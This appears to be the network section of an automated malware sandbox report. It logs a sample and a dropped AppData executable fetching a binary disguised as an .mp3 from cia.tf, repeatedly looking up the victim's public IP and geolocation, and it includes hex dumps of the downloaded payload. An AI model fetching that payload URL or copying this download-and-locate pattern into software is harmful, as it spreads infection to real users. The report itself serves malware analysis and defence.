                                                                        Nov 25, 2024 14:59:41.562829018 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:41 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 9a15adba706746d8ae784f4172d14bf4
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.5 | 49789 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:46.339698076 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:47.527693987 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b5820ae2fe11c33cde7c2846c1da450a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:47.531701088 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:48.085726976 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a53f9ccb97072adc5eb0212ca5f3cddd
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:49.929599047 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:50.267688036 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 3238a7672559bfd61fb7f5dc22197b5c
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.5 | 49802 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:52.220335960 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:53.414978027 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 119d5c0632d59ff1a09da8c80457a625
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.5 | 49814 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:55.259605885 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:56.462474108 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d8e249d39c251a99567965ca3331cf83
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.5 | 49821 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:58.253139019 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:59.450124979 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d27b6a49147d9f909c42d6e204968b26
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.5 | 49830 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 15:00:01.360769033 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:10.898750067 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d7a4dc99a0fe018ecc3d2aa1d8039d88
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.5 | 49856 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 15:00:13.108895063 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:18.952763081 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:18 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f1b43c10483b4bef337e1e9b288b11b0
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.5 | 49877 | 193.122.130.0 | 80 | 6184 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 15:00:20.874562979 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:26.039747000 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b9900e96720ae3a69fed3cab747a863b
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        0 | 192.168.2.5 | 49710 | 104.21.1.182 | 443 | 5144 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:03 UTC | 92 | OUT | GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1
                                                                        Host: cia.tf
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:04 UTC | 967 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:03 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 960008
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=14400
                                                                        content-disposition: attachment; filename="Ccisayi.mp3"
                                                                        etag: W/"ea608-19360808993"
                                                                        last-modified: Sun, 24 Nov 2024 23:27:36 GMT
                                                                        x-powered-by: Express
                                                                        CF-Cache-Status: REVALIDATED
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mziF2njMmRpekpzB1sPnsKqouou0pK5FM%2FLjp1HmAjfWxaVTw17jYTlsK26K0T7C1a0HUkjoEI%2B%2FKSGGBx8o%2BapC2wp3XkRb3g64hRA0b5lKAW5mxdz20sE%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228377956425f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2807&recv_bytes=706&delivery_rate=1525600&cwnd=235&unsent_bytes=0&cid=f408332f55abbe7c&ts=793&x=0"
                                                                        Data Ascii: ;yOFf"ooIXH/2he`4~NWfGZZ3(Ym|jw:ew.sch6{"5jyl|?*%.`w1k#VN|-vo|1@`-5<" f[@F5EjEt]a'TH|*"}d7+geoN!UD
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 81 31 40 66 2d ad e4 de 24 c1 e9 c5 e8 09 b4 bb f7 a9 c9 6a e8 4a b6 f0 39 b4 a6 96 1e 6b 11 26 a0 e9 cc 0e a6 7c 66 e0 e5 1d 9f ff f2 20 88 36 45 44 ec fd 28 33 d7 8e ba 6c 2e cc 0e da 54 32 06 03 68 44 c5 3e c9 af 21 a7 84 24 8b e4 bb fa 84 ca 41 7c cc 0f dd 20 33 8e 25 31 5b 36 b5 00 02 62 01 8e 6b bf be 02 3b 9f 65 fc fb 97 4d 47 15 29 0c ce ad 99 f5 99 a3 83 20 d7 13 6b b5 8d 0f 03 fe 41 65 9d a3 97 ac e7 29 89 56 96 5f d3 f2 48 09 90 52 21 60 a7 d5 5f 88 11 ae 5b 95 b2 35 21 bd 7c ba a7 1a a9 7b 54 f5 14 3e f9 82 fd af 19 64 3c 6e 75 2a 97 49 80 7d 6a 29 a6 4a a6 7e 8f 41 44 e9 51 36 9a 5c 90 00 1f 48 6f 92 48 06 e0 13 41 3f 19 fa 96 84 a0 14 4a 80 e7 03 9e 7d de b5 0c 73 14 d0 27 6c 81 72 a8 56 10 21 b4 be 7e f2 0b 13 ff d1 8c de 02 cd b3 fb 08 e3
                                                                        Data Ascii: 1@f-$jJ9k&|f 6ED(3l.T2hD>!$A| 3%1[6bk;eMG) kAe)V_HR!`_[5!|{T>d<nu*I}j)J~ADQ6\HoHA?J}s'lrV!~
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 34 49 54 a9 2f 35 ed d9 78 e9 43 1b cb 96 78 b2 79 1f c3 4b 64 d1 48 05 1f 62 1e b5 9e 16 a8 b1 15 04 25 93 0f b1 8d 97 0c 7a c2 9f db 4b b3 ce 90 ac 8c 87 92 5c 7e 94 da b7 8d 9c e9 2f 8c 59 29 14 40 ea fd 73 f4 5b f3 9d fe 56 e2 79 06 09 26 6c 29 70 99 a1 0a 21 df c8 2a 64 15 2f e4 7f 00 c4 a7 a1 bb 1a ba 1f 6b 24 9d 38 fd 69 1a e7 a1 b6 5d 7c 78 36 e8 9f b6 e2 28 09 e9 a7 8e 84 92 4a 8e 2d c4 56 dc 0b 20 0c 02 db 1d c0 13 bf e9 47 cc 32 6b f8 f1 32 85 ef ff 65 34 42 a5 77 0e c3 13 c3 82 7c 09 89 b0 83 9a 6b 56 20 86 91 ef 6e b4 d7 89 e1 ba 94 47 18 00 9f 46 b2 41 be 87 ff 43 c3 b8 67 3d 9c 6b eb b3 ec 11 08 8f 82 8d 97 53 44 02 11 be 82 ba ef 3a 2a df d5 4e 23 52 a1 6b 60 9a 98 26 93 69 6c 8a a7 6f e2 9f 3d 5c b2 34 a0 db 06 ab b3 f9 e6 bc 1c cd 76 cd
                                                                        Data Ascii: 4IT/5xCxyKdHb%zK\~/Y)@s[Vy&l)p!*d/k$8i]|x6(J-V G2k2e4Bw|kV nGFACg=kSD:*N#Rk`&ilo=\4v
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 98 81 b6 2e 27 d7 f0 5e 3d 83 3b 33 a9 0d 17 89 1f 28 33 29 ba 75 11 72 cc dd d0 49 c0 96 d4 ff 4e 8d 14 18 de fa 54 8b c3 47 6e 79 ac c7 d7 bc e5 6b 04 f2 5c 71 b0 cd 68 eb 2f 67 17 cc 77 53 32 a7 da c7 a6 24 71 9c 26 3d a4 96 f9 32 2f e9 d9 0e 93 24 89 a4 13 8d 94 fe 91 90 65 a9 d5 23 c8 5f ff cb 6c f4 40 3c 6c 56 91 b2 75 d7 19 73 6a da d5 0d 01 4d 61 96 f7 04 a6 8b a2 49 88 6b f9 bf ad 37 02 1e 74 fd 7a 10 78 77 a9 55 23 58 85 24 5f e5 d5 b2 b5 93 c0 e3 28 02 6c 48 d5 84 3d 16 7d d3 9d 01 1c 83 b7 d6 37 19 b0 3a 08 76 d4 5c 33 54 f1 d7 b6 a7 d5 f0 12 d0 6d a1 43 de b0 cb 00 05 e6 cc 59 82 a4 1d cf c3 37 0d a8 ad f1 5f 6e c0 08 31 0b c4 3c 21 8f 7d f2 5b ce 90 44 e1 7f 23 7f d3 46 5b 6c c6 27 5b 98 8d e5 e4 73 26 b0 69 8b 6b 55 35 d0 e8 58 f7 be 0b a2
                                                                        Data Ascii: .'^=;3(3)urINTGnyk\qh/gwS2$q&=2/$e#_l@<lVusjMaIk7tzxwU#X$_(lH=}7:v\3TmCY7_n1<!}[D#F[l'[s&ikU5X


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.2.5 | 49716 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:22 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:23 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:22 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507071
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg8HEh0cWCiIMCe%2BgmlVaNK7qxFYE0gurDEJOIjhrZVAC99Ic0Z5p67wKubuWRw96iueZqHxyz23NQCrgy%2BYOD96Y3SwGLpGjsxw0LpZsyKep1jepsWG%2Flki1O4UiRKrvpYvUCt9"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228afae5d41f2-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1665715&cwnd=224&unsent_bytes=0&cid=c624bc4e7c0e4f60&ts=725&x=0"
                                                                        2024-11-25 13:59:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.5 | 49724 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:24 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:25 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:24 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507073
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5adexoPL7T5uNy5lXAMOpukLI4Bw8cA6EOayv914I6QUHi1AMBY5ESdWJ9BO7xTJDGLNyDEAGCwhpk68nbzHoiaxpkWpQEJNHAd59xw3o%2FubPHfVhhP2KYjuFFFtzsh%2BK%2FPOvPRM"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228bc8cf9c33f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1709601&cwnd=233&unsent_bytes=0&cid=bd68a1bbe45c6b09&ts=460&x=0"
                                                                        2024-11-25 13:59:25 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.5 | 49732 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:27 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:27 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:27 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507076
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AmY8%2FSL1QMwVwTmyfv8szoXiEntwcgfKrjA9lnt0WMhsIxlyhAfnVGKcrBcRkXMXVi4nRHmodPzXT60Ge7eP9%2B6qYZguyCe0kA4gcVg4Jsw1GgySy%2Bc23zkYJS7J08jwcuLzkhc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228cedcdf1906-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1844598&cwnd=252&unsent_bytes=0&cid=55b3214f1bfde512&ts=468&x=0"
                                                                        2024-11-25 13:59:27 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.5 | 49739 | 172.67.177.134 | 443 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:30 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:31 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507079
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uW1P1KmJYJggOFOiG8GUC2v8hvmA36VT08K8Tk7Ip7wXm53gbr07te%2FhSKjbWtB%2FzyFxnMsCPjA94snHKZiMfAN%2F0MqN9XzN1l6PQ3ukAV4j%2BOUEqVsKmw7q%2Fl8nBBxpCmJqS446"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228e25bfd2363-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1404521&cwnd=252&unsent_bytes=0&cid=ea7c257e5c09fe00&ts=472&x=0"
                                                                        2024-11-25 13:59:31 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.5 | 49746 | 104.21.1.182 | 443 | 2888 | C:\Users\user\AppData\Roaming\ishon.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-11-25 13:59:32 UTC | 92 | OUT | GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1
                                                                        Host: cia.tf
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:33 UTC | 969 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:33 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 960008
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=14400
                                                                        content-disposition: attachment; filename="Ccisayi.mp3"
                                                                        etag: W/"ea608-19360808993"
                                                                        last-modified: Sun, 24 Nov 2024 23:27:36 GMT
                                                                        x-powered-by: Express
                                                                        CF-Cache-Status: REVALIDATED
                                                                        Accept-Ranges: bytes
